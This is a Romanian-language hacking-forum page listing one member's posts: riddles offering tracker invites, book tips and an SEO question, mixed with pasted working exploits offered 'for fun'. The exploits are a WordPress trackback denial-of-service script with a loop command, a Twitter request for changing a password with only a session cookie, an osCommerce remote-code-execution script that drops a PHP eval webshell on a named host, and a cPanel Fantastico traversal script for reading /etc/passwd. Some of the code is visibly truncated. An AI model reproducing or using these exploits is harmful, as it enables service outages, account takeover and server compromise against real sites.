Jump to content

adi003

Active Members
  • Posts

    104
  • Joined

  • Last visited

Everything posted by adi003

  1. Shinny not nu credeam ca o sa fie atatea raspunsuri
  2. virusz esti pe aproape
  3. not try harder
  4. daatdraqq nice try dar parca nu vad universul ca un cufar
  5. Dau cadou: 1 invitatie pe iplay.ro 1 invitatie scenefz.ro 1 invitatie freshon.tv Ca sa nu fie scanal vor fi 3 ghicitori: prima pentru iplay.ro urmeaza: Un cufar fara cheie balamale sau capac, in interior o comoara aurie sta ascunsa. Care e comoara? Ce este cufarul? Primul care raspunde castiga. Exista un singur raspuns corect. Daca mai exista raspunsuri corecte(logice) dar care difera de raspunsul pe care eu il cunosc NU castigi sry.
  6. offtopic: Pavel Corut 1981-1985 - activeaz? în spionaj la Direc?ia de Informa?ii a armatei ca ofi?er de rela?ii externe 1985 - este avansat în func?ia de ?ef Birou Contrainforma?ii în Direc?ia Contrainforma?ii Militare. În luna decembrie a acelui an în cadrul unei mese festive î?i exprim? anumite opinii în leg?tur? cu activitatea ?efilor motiv pentru care este luat în urm?rire de c?tre organele speciale ale statului. 1986-1989 - se contureaz? proiectul care va prinde via?? peste câ?iva ani seria Octogonul 1990 - este trecut în rezerv? printr-un ordin semnat de Nicolae Militaru
  7. O suta de ani de zile la portile orientului Maestul si Margareta Jocul cu margele de sticla Friedrich Nietzsche - Asa Graita Zarathustra must read. enjoy
  8. Apress - Professional Linux System Administration Nice to have Enjoy FileBox Apress - Professional Linux System Administration.pdf http://www.ziddu.com/download/7741315/Apress-ProfessionalLinuxSystemAdministration.pdf.html
  9. thanks. lucruri noi (pt mine)
  10. <?php /* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * security@wordpress.org contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org> * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */ if(count($argv) < 2) die("You need to specify a url to attack\n"); $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n"); $path = (count($data)==2)?"":$data['path']; $path = trim($path,'/').'/wp-trackback.php'; if($path{0} != '/') $path = '/'.$path; $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($; $charset = ""; $charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset); $str .= '&url=www.example.com'; $str .= '&title='.$b; $str .= '&blog_name=lol'; $str .= '&excerpt=lol'; for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."\n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: ".$data['host']."\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($str)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $str."\r\n\r\n"); echo "hit!\n"; } } ?> have fun. autorul e mentionat in script
  11. OK, so it wouldn't be fair if I asked all of you to post but didn't post anything myself. Plus, if you took the bother to visit the forum and actually check it out, why not get something out of it? So here's something I found the other day: On Twitter, you have to specify your old password to change your email, your username, or your password, of course. Vulnerability: just having the twitter session ID, it is possible the change all of these without knowing the actual password. This is done by using the "user settings" interface instead of the one meant to change your password. Just add an extra user[user_password] variable to the post, and voila. Exploit: POST /account/settings HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */* Referer: Twitter Accept-Language: hu-HU User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: twitter.com Content-Length: 366 Connection: Keep-Alive Cache-Control: no-cache Cookie: lang=en; _twitter_sess=session-id; authenticity_token=f3c4667fd7b4231d279159af8ce76a85d06631b9&user%5Bname%5D=yourname&user%5Bscreen_name%5D=username&user%5Bemail%5D=whatever@yourmail.com&auth_password=&user%5Btime_zone%5D=Greenland&user%5Burl%5D=&user%5Bdescription%5D=&user%5Blocation%5D=&user%5Blang%5D=en&user%5Bprotected%5D=0&commit=Save&user%5Buser_password%5D=new_password sursa enjoy
  12. abia astept detaliile. dar l-ai testat si ti-a mers?
  13. <?php print_r(' +---------------------------------------------------------------------------+ osCommerce Online Merchant 2.2 RC2a RCE Exploit by Flyh4t mail: phpsec@hotmail.com team: http://www.wolvez.org dork: Powered by osCommerce Gr44tz to q1ur3n ?puret_t?uk?toby57 and all the other members of WST Thx to exploits of blackh +---------------------------------------------------------------------------+ '); $host ='democn.51osc.com'; $path = '/'; $admin_path = 'admin/'; $shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>"; $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n"; $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $message.="Accept-Language: zh-cn\r\n"; $message.="Content-Type: application/x-www-form-urlencoded\r\n"; $message.="Accept-Encoding: gzip, deflate\r\n"; $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $message.="Host: $host\r\n"; $message.="Content-Length: ".strlen($shellcode)."\r\n"; $message.="Connection: Close\r\n\r\n"; $message.=$shellcode; $fd = fsockopen($host,'80'); if(!$fd) { echo '[~]No response from'.$host; die; } fputs($fd,$message); echo ("[+]Go to see U webshell : $host/fly.php"); ?> # milw0rm.com [2009-08-31] stiu ca o sa par noob dar am gasit siteuri care au aceasta vers. dar nu a functionat. fac ceva gresit?
  14. reupload plz si poate il pui si pe aici
  15. PHP Code: luat de pe yagbu.net <?php /* ######################################## # Deadly Script by Super-Crystal # bypass Cpanel fantastico ####################################### */ set_time_limit(0); if(isset($_POST['sup3r'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { $phpwrapper = '<?php include_once("./language/".$_GET[sup3r].".php"); ?> '; fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit...<br />"; echo "coding by Super-Crystal <br />"; echo "Cleaning up<br />"; echo "Done!<br /> </pre>"; } else { echo "error : ".php_uname(); } } else { ?> <div align="center"> <h3>Deadly Script</h3> <font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br /> <pre><div align="center"> </pre></div><br /> <table border="0" cellspacing="0"> <tr> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option> </select> </td> </tr> <tr> <td><div align="right">change</div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td> </tr> <tr> </table> </div> <input type="hidden" name="sup3r" value="doit" /> <input name="submit" type="submit" value="Submit" /><br /> 1- change /home/[user]/.fantasticodata/language.php <br /> 2- click on the submit <br /> 3- now put it like this (e.g) : http://www.Your_Domain_Name.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 . <br /> <font color=red>Written: 10.10.2008</font><br /> <font color=blue>Public: 26.11.2008</font><br /> </form> <?php } ?> save as exploit.php.
  16. reup please
  17. )) omg this is epic
  18. dar daca asa avea 100 de siteu-uri pe servere diferite fiecare (da pe servere diferite) si fiecare are fi de pagerank2 sau 3. daca as face linkbuilding intre ele google are avea ceva de spus? as primi ban? eu cred ca nu dar vreau sa fiu sigur
×
×
  • Create New...